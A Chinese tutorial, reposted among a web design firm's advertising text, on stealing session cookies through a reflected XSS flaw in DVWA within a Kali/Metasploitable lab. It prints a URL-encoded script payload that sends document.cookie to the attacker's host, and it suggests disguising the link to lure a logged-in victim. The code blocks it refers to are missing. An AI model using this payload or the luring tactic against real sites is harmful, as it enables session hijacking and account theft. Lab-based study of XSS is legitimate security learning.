十年网站开发经验 + 多家企业客户 + 靠谱的建站团队
量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决
这篇文章主要讲解了“如何利用XSS漏洞获取对方cookie”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“如何利用XSS漏洞获取对方cookie”吧!
主要从事网页设计、PC网站建设(电脑版网站建设)、wap网站建设(手机版网站建设)、成都响应式网站建设公司、程序开发、微网站、微信小程序开发等,凭借多年来在互联网的打拼,我们在互联网网站建设行业积累了丰富的网站建设、成都网站建设、网络营销经验,集策划、开发、设计、营销、管理等多方位专业化运作于一体,具备承接不同规模与类型的建设项目的能力。
(1)环境搭建
kali linux:192.168.80.136
目标win7: 192.168.80.130
Metasploitable:192.168.80.129
cookie接收脚本get.php(脚本在/var/www/html文件夹下,html文件夹权限777):
(2)XSS漏洞利用
目标登录metasploitable的DVWA,点击存在XSS漏洞的页面,输入如下代码后提交:
(3)查看cookie
切换到kali,直接查看cookie.txt内容,可以看到获得的cookie。
(4)进一步利用
目标提交后可以在地址栏看到如下URL:
http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E#
可以将以上URL伪装成其他形式(如图片),诱使目标点击,在目标已登录的情况下,可以达到同样获取cookie的效果。
感谢各位的阅读,以上就是“如何利用XSS漏洞获取对方cookie”的内容了,经过本文的学习后,相信大家对如何利用XSS漏洞获取对方cookie这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是创新互联,小编将为大家推送更多相关知识点的文章,欢迎关注!